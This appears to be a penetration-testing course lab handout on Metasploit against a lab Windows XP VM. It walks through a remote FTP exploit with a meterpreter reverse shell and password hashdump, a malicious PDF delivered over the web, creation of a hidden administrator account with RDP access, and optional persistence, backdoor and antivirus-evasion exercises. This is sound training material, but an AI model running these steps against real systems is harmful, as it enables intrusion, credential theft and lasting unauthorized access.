Deliver the malicious file to your victim VM via a web page (backtrack comes with
... 1) Start Windows XP MSF Lab and Backtrack5 R2 VMs. -Login to BT (login ...
Metasploit Lab The Metasploit® Framework is a free, open source framework for developing, testing, and using exploit code developed by the open source community and Rapid7. It is the de-facto standard for penetration testing with more than one million unique downloads per year, as well as the world’s largest, public database of quality assured exploits. This lab is built on the knowledge gained in previous labs. You are required to know how to enumerate information from a remote server and its services (nmap, openvas, netcat, or any other scanner you feel comfortable using). Once enough information is gathered, the next step in the penetration testing process is to develop an attack plan.
Objective & Turn In Objective: ●
Part 1 - Remote Exploits with Metasploit ■ Successfully exploit victim using a remote exploit included in Metasploit. (rooting the victim machine via "physical access" does not count) ■ Acquire a text copy of the file containing the hashed passwords of the victim machine.
●
Part 2 - Client Side Exploits with Metasploit ■ Create a PDF file with malicious code embedded into it. ■ Deliver the malicious file to your victim VM via a web page (backtrack comes with apache ready for use). ■ Create a user account on victim machine (with administrator privileges). ■ Gain access to victim VM via Remote Desktop Protocol (RDP).
●
Part 1 - Remote Exploits with Metasploit ■ Hashdump of victim machine ■ Short write up of your remote exploit process. For example, state what application you exploited, what payload you used, how you downloaded the hashed passwords and anything else you think is important. How you go about getting this information depends on your attack plan.
●
Part 2 - Client Sice Exploits with Metasploit ■ Screenshot of victim's RDP Desktop ■ Short write up of your client side exploit process using the same guidelines as in Part 1 (How was it done, what did you use, plus anything else worth mentioning).
Turn in:
Keys to success with this lab: ● Know which ports are open (nmap is your friend) ● Get the version information for the services (nmap --help) ● You can restart the VM to reset the victim machine if your exploit fails
There are a number of ways to get the hashed passwords. Meterpreter provides a facility that will pull the data for you (type ‘help’ when in meterpreter). This method, however, may or may not work for certain exploited applications. The alternative way is to get a command prompt (shell) from the victim machine, start a tftp server on your machine, and download pwdump.exe (included in Backtrack). You can find it in backtrack by searching ‘locate pwdump’ from the terminal), then execute pwdump.exe on the victim machine, redirecting its output to a file. Once complete, you can upload the results to the Backtrack machine.
Starting the VMs Windows XP MSF Lab - Windows (VICTIM) - IP => 10.0.0.11 Backtrack5 R2
- Backtrack5 R2 (ATTACKER) - IP => 10.0.0.10 -username: root -password: toor
1) Start Windows XP MSF Lab and Backtrack5 R2 VMs. -Login to BT (login info above) - Start GUI Interface by typing: startx - Enable Shared Folder: (To transfer data from VM to host) mount.vboxsf -w VM_Shared ~/Desktop/VM_Shared -Verify that both the victim and attacker machines are able to ping each other. 2) Reconnaissance: - Determine the Operating System fingerprint, any opened ports, and the version of the services running on those opened ports for the victim machine. This information will be used to determine how to carry out your remote exploit attack (to select your attack vector).
Part 1 - Remote Exploits with Metasploit Remote exploits abuse vulnerabilities found in a victim's software posture (i.e. system, services or application software), in order to execute malicious code on the victim machine from a remote system (over the network), without prior access to the victim's machine. Metasploit includes numerous local and remote exploits, as well as auxiliary modules. It also provides many different interfaces for interacting with its facilities. For this lab we will focus on msfconsole. First we need to start msfconsole on the Backtrack VM by typing the following in a terminal: msfconsole
--The following is an example of the remote exploit process for a victim running WS FTP Server. Use the information you gathered in the reconnaissance phase to determine which exploit to use for your victim-The first step is to search for an exploit that will work for your target: search ws_ftp This query will return a couple of results like below:
Then we select an exploit, type: (This will also change your msf command prompt) use windows/ftp/wsftp_server_503_mkd Type the following to examine the exploit options: show options
The next step is to select a payload. Metasploit includes a vast array of payloads, one of the more popular ones is called Meterpreter. Meterpreter is sort of the swissarmy knife of payloads, so we will use it for our malicious payload. In order to use a particular payload you must first verify that the payload is available for that particular exploit. Some exploits have only a small landing area and can only hold a small payload. This size value is defined in the metasploit module.
To determine what exploits are available, we will issue the following command: show payloads This should display all the payloads available to the exploit you selected. Lets look for the Meterpreter reverse tcp for windows payload. Note: reverse_tcp and bind_tcp are the two most common categories of payloads for remote exploits. Reverse_tcp means - once exploited, connect back to the attacker. Bind_tcp means - open a port on the victim machine, and listen for the attacker's request to connect. To select the meterpreter payload enter the following command: set PAYLOAD windows/meterpreter/reverse_tcp Then issue a show options to see which options must be defined. The result of this command should look like the following:
Next step is to select a target (some exploits do not require target selection). To determine if the selected exploit requires target selection type: show targets Then select the target Id number corresponding to your target system by issuing the following: set Target-ID-Number
The last step is to set all required options before running the exploit. Verify all required options are defined, such as RHOST and LHOST. RHOST refers to the remote victim's IP address, whereas LHOST stands for our attacking (listening) machine's IP. set RHOST set LHOST Each payload has different required options that must be defined in order for Metasploit to successfully execute. But for this example we are ready to go. To run your exploit simply type: exploit To get the hashed passwords within meterpreter type (turn in text copy of this output): hashdump
Part 2 - Client Side Exploits with Metasploit Client side exploits take advantage of installed software on network client machine, and require user interaction (such as executing a file, or visiting a malicious website) to successfully cause a breach. We will be using CVE2008-2992, which affects adobe acrobat reader 8.1.2. We can use google to search for 'cve-2008-2992 site:securityfocus.com'. This search returns the following page: http://www.securityfocus.com/bid/30035. After reading the vulnerability disclosure bulletin, we discover that the vulnerability involves the util.printf() javascript function used by adobe's acrobat reader. Exit your Meterpreter session. Search for an exploit affecting adobe and print util as per CVE article: search adobe_utilprint Then we select an exploit, type: (This will also change your msf command prompt) use exploit/windows/fileformat/adobe_utilprintf We then select the Meterpreter payload as our malicious payload to embed into our PDF file. This is the payload that is executed on the victim's machine when they open the file: set PAYLOAD windows/meterpreter/reverse_tcp Type the following to examine the exploit's options: show options Next we set all required options (remember that all required options must be defined): set LHOST set LPORT set FILENAME whatever-you-want-to-name-your-file .pdf (do not forget the .pdf extension)
This specific exploit does not require target selection. It will create a PDF file with our embedded payload. Metasploit will not execute the exploit against any specific target. Once all options are set, run the exploit to create your malicious PDF: exploit
Open a new terminal in the Backtrack VM and start the apache server: /etc/init.d/apache2 start Then, in same terminal as above, move the your exploit (your malicious PDF) to the apache web root by typing the following: mv /root/.msf4/local/whatever-you-named-your-file.pdf /var/www In order to "catch" the payload, once the client opens the file, we need a service waiting for the incoming connection. We will use Metasploit's Multi-Handler to provide this service. Back on the msfconsole terminal, type the following to start the multi-handler: use exploit/multi/handler
We have to set the type of payload that will be connecting back to the service, the port, and the IP address to listen on: set PAYLOAD windows/meterpreter/reverse_tcp set LPORT set LHOST Once all options are set properly, run the handler by typing: exploit
We are now ready to receive the call-back connection from the victim, which will be made once the user opens our malicious PDF. On XP VM (victim): Open a web browser Navigate to attacker's webpage (http://10.0.0.10/whatever-you-named-your-file.pdf) Open the file. On Backtrack (attacker): Once the Meterpreter payload calls back (which can take a minute, so don't panic), and send the Meterpreter reverse shell, we move on to post exploit mode.
We will now migrate our shell to a stable process in case the victim closes the pdf file. To determine which pid to use type: ps -A (This will display all the processes currently running and the PIDs associated with them) To migrate our shell to a stable process select the PID of a system process (or an essential user process like explorer.exe): migrate system-process-PID
The final step is to enable Remote Desktop Protocol (RDP) on the victim machine: run getgui -e
Then we drop into a Windows command prompt by typing: shell Created a local user account as follows: net user hacker hacker /add Add this account to the local Administrators group: net localgroup Administrators hacker /add And to the local Remote Desktop Users group, so we can connect via rdp into the victim machine: net localgroup "Remote Desktop Users" hacker /add We then hide our malicious user account: run getgui -u hacker -p hacker Finally, we connect to the victim machine via rdp, and login to the victim machine with the credential we created in the previous steps: rdesktop victim-IP-address (Remember to grab the screenshot of the RDP session Desktop - Alt + prtScn)
Extended Learning If you want to be a ninja, create a payload that is an executable with with this command: msfpayload windows/shell_bind_tcp RHOST=192.168.56.101 X > bind_shell.exe and upload it somewhere sneaky then add it to the system start up. There are a number of ways you can do this. Adding this registry key is one way: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices\trojan.exe
If you want to be a super sneaky ninja you could instead create a reverse_tcp shell to connect back to you on start up, then restart the victim. While the victim machine restarts be sure to have a listening netcat session on your attacker to accept the reverse shell. You can also try to drop a backdoor as part of your post exploit phase, so you can continue to have access to the victim machine without having to execute the entire exploit process again. Try some different payloads. For example, windows/vncinject/reverse_tcp is a really fun one to run within metasploit. Create a client side exploit that is NOT detectable by antivirus software. The pdf we created in this lab will set off any antivirus application. Metasploit provides an encoder to avoid antivirus detection. You can read more about it on metasploit-unleashed.
